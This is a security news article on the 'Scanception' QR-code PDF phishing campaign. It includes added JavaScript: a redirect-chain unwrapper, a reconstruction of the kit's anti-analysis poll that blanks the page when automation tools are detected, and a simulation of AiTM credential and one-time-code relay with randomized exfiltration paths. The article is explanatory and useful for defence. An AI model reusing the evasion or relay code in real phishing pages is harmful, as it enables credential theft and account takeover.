New QR Code Attack Via PDFs Evades Detection Systems and Harvests Credentials

A sophisticated phishing campaign dubbed “Scanception” has emerged as a significant threat to enterprise security, leveraging QR codes embedded in PDF attachments to bypass traditional email security measures and harvest user credentials.

The attack is a notable evolution in social engineering: it exploits the habit of scanning QR codes with a phone for quick access to resources, which typically moves the rest of the attack onto a personal mobile device, outside the organization's web proxy and endpoint controls.

The campaign operates through a multi-stage attack chain that begins with carefully crafted phishing emails containing PDF attachments designed to mimic legitimate business communications.


These documents, often masquerading as HR handbooks or corporate announcements, contain professionally formatted content complete with authentic-looking logos and organizational branding to establish trust with potential victims.

Employee Handbook email lure (Source – Cyble)

What makes this attack particularly insidious is the placement of the malicious QR code on the final page of a multi-page PDF. Automated scanners that render and decode only the first page (or a thumbnail) of an attachment never see it; a defensive check has to render and decode every page before it can judge the document.

Cyble analysts identified over 600 unique phishing PDFs associated with this campaign within just three months, with nearly 80% showing zero detections on VirusTotal at the time of analysis.

Decoy PDF document (Source – Cyble)

The technical sophistication of Scanception extends beyond simple QR code deployment.

Phishing QR code (Source – Cyble)

Once a victim scans the embedded code, the phone is bounced through a chain of redirect endpoints on legitimate services, with YouTube, Google, Bing, and Cisco platforms named, so the URL encoded in the QR code, and the first domains a victim or a URL scanner sees, belong to trusted brands rather than to the attacker.

This abuse of reputable infrastructure significantly reduces the likelihood of detection by reputation-based security systems.
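The redirect chain described above can be unwrapped statically, without ever fetching the attacker's page. The following is an added example (not code from the Cyble report or the phishing kit): it peels each hop off by reading the target out of the redirector's query string and then checks whether the final landing host is a genuine sign-in host. The redirector hostnames and parameter names are assumptions about common redirect endpoints, not indicators from this campaign, and the sample QR payload is constructed.

```javascript
// Added example (not from the Cyble report): statically unwrap a chain of
// redirect endpoints on legitimate services to find where a QR code actually
// lands, without fetching anything. The hostnames and parameter names below are
// assumptions about common redirector endpoints, not indicators from the campaign.
const KNOWN_REDIRECTORS = {
  "www.youtube.com": { path: "/redirect", param: "q" },
  "www.google.com":  { path: "/url",      param: "q" },
};
const MAX_HOPS = 10;

// Return the next URL in the chain, or null if this URL is not a redirector.
function nextHop(urlString) {
  let url;
  try { url = new URL(urlString); } catch { return null; }
  const rule = KNOWN_REDIRECTORS[url.hostname];
  const candidates = [];
  if (rule && url.pathname === rule.path) candidates.push(url.searchParams.get(rule.param));
  // Generic fallback: any query value that is itself an absolute http(s) URL.
  for (const value of url.searchParams.values()) candidates.push(value);
  return candidates.find((c) => c && /^https?:\/\//i.test(c)) || null;
}

// Follow the chain statically (bounded, so a redirect loop cannot hang us)
// and report every hop.
function unwrapRedirects(startUrl) {
  const chain = [startUrl];
  for (let i = 0; i < MAX_HOPS; i++) {
    const next = nextHop(chain[chain.length - 1]);
    if (next === null) break;
    chain.push(next);
  }
  return { finalUrl: chain[chain.length - 1], chain, hops: chain.length - 1 };
}

// Verdict for a login lure: only an exact match on the real sign-in hosts is trusted.
const TRUSTED_LOGIN_HOSTS = ["login.microsoftonline.com", "login.microsoft.com"];
function isTrustedLogin(finalUrl) {
  try { return TRUSTED_LOGIN_HOSTS.includes(new URL(finalUrl).hostname); } catch { return false; }
}

// Constructed sample: the QR payload points at YouTube, which bounces to Google,
// which lands on an attacker-controlled host (placeholder, not a real indicator).
const SAMPLE_QR_URL =
  "https://www.youtube.com/redirect?event=video_description&q=" +
  encodeURIComponent("https://www.google.com/url?q=" +
    encodeURIComponent("https://attacker.invalid/o365/login"));

const SAMPLE_RESULT = unwrapRedirects(SAMPLE_QR_URL);
console.log(SAMPLE_RESULT.chain.join("\n  -> "));
console.log("trusted login:", isTrustedLogin(SAMPLE_RESULT.finalUrl));
```

The point of the static approach is that a reputation check on the first hop says nothing; the verdict has to be taken on the last hop, and an exact hostname match against the real sign-in hosts is the only safe test (substring matches on "microsoft" are exactly what look-alike domains are built to pass).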

Advanced Evasion and Credential Harvesting Mechanisms

The phishing infrastructure invests heavily in evasion.

Upon reaching the fake Office 365 login portal, the malicious website employs sophisticated detection mechanisms to identify automated analysis tools.

The site continuously monitors for the presence of security research tools such as Selenium, PhantomJS, or Burp Suite using JavaScript functions that execute every 100 milliseconds.

When such a tool is detected, the page immediately redirects to “about:blank”, terminating the attack chain: the sandbox records an empty page and never reaches the credential form it was meant to capture.
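As an added illustration of the 100 ms poll described above (this is a reconstruction, not the Scanception kit's own source), the block below shows both sides: the kit's polling routine, which abandons the page as soon as an automation fingerprint appears, and the analyst's counter, a window object with those fingerprints masked so the poll never fires. Which properties the kit actually probes is not published; the signals used here (navigator.webdriver for WebDriver-driven browsers, window._phantom and window.callPhantom for PhantomJS) are assumptions based on common automation fingerprints, and the window objects are constructed stand-ins.

```javascript
// Added example, not the Scanception kit's source: a reconstruction of the
// kind of 100 ms anti-analysis poll described above. Which properties the kit
// actually probes is not published; the signals checked here (navigator.webdriver
// for WebDriver-driven browsers, window._phantom / window.callPhantom for
// PhantomJS) are assumptions based on common automation fingerprints.
function looksAutomated(win) {
  const nav = win.navigator || {};
  return nav.webdriver === true || "_phantom" in win || "callPhantom" in win;
}

// Kit side: poll every 100 ms and, on detection, abandon the page so the
// sandbox records nothing but about:blank. Returns the timer id.
function startEvasionPoll(win, intervalMs = 100) {
  const id = win.setInterval(() => {
    if (looksAutomated(win)) {
      win.clearInterval(id);
      win.location.href = "about:blank";
    }
  }, intervalMs);
  return id;
}

// Analyst side: the poll only reads properties, so a copy of the window with those
// fingerprints masked never trips it and the credential form stays reachable.
function maskedWindow(win) {
  const { _phantom, callPhantom, navigator, ...rest } = win;
  return { ...rest, navigator: { ...(navigator || {}), webdriver: false } };
}

// Constructed window objects standing in for real browser environments.
const SELENIUM_LIKE = { navigator: { webdriver: true } };
const PHANTOM_LIKE  = { navigator: {}, callPhantom: () => {} };
const REAL_BROWSER  = { navigator: { webdriver: false } };

console.log("selenium-like flagged:", looksAutomated(SELENIUM_LIKE));
console.log("masked selenium flagged:", looksAutomated(maskedWindow(SELENIUM_LIKE)));
```

In a real browser the equivalent of maskedWindow is redefining the getters (for example Object.defineProperty on Navigator.prototype for webdriver) before the kit's script runs, or pausing on the location assignment in the debugger; either way the lesson for a sandbox is that a 100 ms poll will win against any detonation that leaves default automation fingerprints in place.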

The credential harvesting process utilizes an Adversary-in-the-Middle (AITM) approach through a function called sendAndReceive(), which orchestrates real-time communication with attacker-controlled infrastructure.

Stolen credentials are exfiltrated via POST requests to dynamically generated endpoints. The paths come from a randroute() function built on the open-source randexp.js library (shipped as randexp.min.js from GitHub), which produces random strings that match a regular expression, so every submission goes to a different URL path and a signature keyed on a fixed exfiltration path never matches.

The campaign’s multi-factor authentication bypass capability represents its most concerning aspect, as the infrastructure maintains an open communication channel to prompt victims for additional authentication data including 2FA tokens, email verification codes, and SMS-delivered one-time passwords.

This stepwise approach yields a fully authenticated session rather than just a password: the attacker obtains account takeover and long-term persistence in the compromised Microsoft 365 environment, and OTP-style MFA is defeated because the password and the one-time code are relayed to the legitimate authentication service in real time, before they expire. Only factors bound to the origin being authenticated to, such as FIDO2/WebAuthn security keys, cannot be relayed this way, because the assertion signed on the phishing page names the wrong origin and the real service rejects it.
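The following added example (not the kit's code; MockIdp, RelayKit, randomRoute and the users, codes and paths are all constructed for the demo) simulates the exchange behind the two paragraphs above: the phishing page posts each form to a randomized path, the backend relays it to the identity provider in real time, and the provider's next challenge is forwarded back to the victim. It walks one victim on SMS/app OTP through to a stolen session cookie, and a second victim on a FIDO2 key through to a rejected assertion, to show why the relay works against one and not the other. randomRoute is a stand-in for randroute() and does not use randexp.js.

```javascript
// Added example, not the Scanception kit's source: a self-contained simulation
// of the stepwise AiTM relay described above. MockIdp stands in for the real
// login service, RelayKit for the phishing page plus its backend; all names,
// users, codes and paths are constructed for the demo.

const RP_ORIGIN = "https://login.example-idp.invalid";   // legitimate login origin (constructed)
const PHISH_ORIGIN = "https://attacker.invalid";          // where the QR code lands (constructed)

class MockIdp {
  constructor(users) { this.users = users; this.txns = new Map(); }
  // Step 1: password check. Returns which second factor to ask for next.
  password(user, pw) {
    const u = this.users[user];
    if (!u || u.password !== pw) return { status: "denied" };
    const txn = `txn${this.txns.size + 1}`;
    this.txns.set(txn, user);
    return { status: "mfa_required", method: u.mfa, txn };
  }
  // Step 2a: SMS/app OTP. Nothing binds the code to the origin it was typed into,
  // so a code the victim gives the phishing page is as good as one typed here.
  otp(txn, code) {
    const user = this.txns.get(txn);
    if (!user || this.users[user].mfa !== "otp" || this.users[user].otp !== code) return { status: "denied" };
    return { status: "ok", cookie: `SESSION=${txn}.${user}` };
  }
  // Step 2b: FIDO2/WebAuthn. The authenticator signs the origin it was invoked
  // from; the IdP rejects assertions for any origin other than its own.
  webauthn(txn, assertion) {
    const user = this.txns.get(txn);
    if (!user || this.users[user].mfa !== "fido2") return { status: "denied" };
    if (assertion.origin !== RP_ORIGIN) return { status: "denied", reason: "origin mismatch" };
    return { status: "ok", cookie: `SESSION=${txn}.${user}` };
  }
}

// Stand-in for randroute(): a fresh POST path per submission drawn from a
// pattern rather than a fixed string, so a path-based signature will not match.
function randomRoute(rng = Math.random) {
  const pick = (chars, n) => Array.from({ length: n }, () => chars[Math.floor(rng() * chars.length)]).join("");
  return `/${pick("abcdefghijklmnopqrstuvwxyz", 6)}/${pick("0123456789abcdef", 8)}.php`;
}

class RelayKit {
  constructor(idp) { this.idp = idp; this.loot = []; }
  // The phishing page POSTs each form to a randomized path; the backend relays it
  // to the IdP in real time and tells the page what to prompt for next.
  handle(msg) {
    const path = randomRoute();
    this.loot.push({ path, ...msg });
    let r;
    if (msg.type === "password") r = this.idp.password(msg.user, msg.pw);
    else if (msg.type === "otp") r = this.idp.otp(msg.txn, msg.code);
    else if (msg.type === "webauthn") r = this.idp.webauthn(msg.txn, msg.assertion);
    else r = { status: "denied" };
    if (r.status === "ok") this.loot.push({ path, type: "cookie", cookie: r.cookie });
    return r;   // "mfa_required": page shows the OTP/SMS form; "ok": page redirects to a decoy
  }
}

// Walk one victim through the kit. The victim does what the page asks; a FIDO2
// authenticator signs the origin it actually sees, which is the phishing origin.
function phishVictim(kit, user, pw, secondFactor) {
  const step1 = kit.handle({ type: "password", user, pw });
  if (step1.status !== "mfa_required") return step1;
  if (step1.method === "otp")
    return kit.handle({ type: "otp", txn: step1.txn, code: secondFactor });
  return kit.handle({ type: "webauthn", txn: step1.txn, assertion: { origin: PHISH_ORIGIN, sig: secondFactor } });
}

// Constructed users: one on SMS/app OTP, one on a FIDO2 key.
const USERS = {
  "alice@corp.invalid": { password: "Winter2024!", mfa: "otp", otp: "482913" },
  "bob@corp.invalid":   { password: "Spring2024!", mfa: "fido2" },
};

const demoKit = new RelayKit(new MockIdp(USERS));
console.log("otp victim:", phishVictim(demoKit, "alice@corp.invalid", "Winter2024!", "482913"));
console.log("fido2 victim:", phishVictim(demoKit, "bob@corp.invalid", "Spring2024!", "sig-bytes"));
```

The detection corollary is the same as for the randomized paths: neither the exfiltration URL nor the credential flow offers a stable signature, so the durable signals are the sign-in itself (a successful session from an unexpected client or location immediately after an MFA prompt) and, on the prevention side, moving high-value accounts to origin-bound factors.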

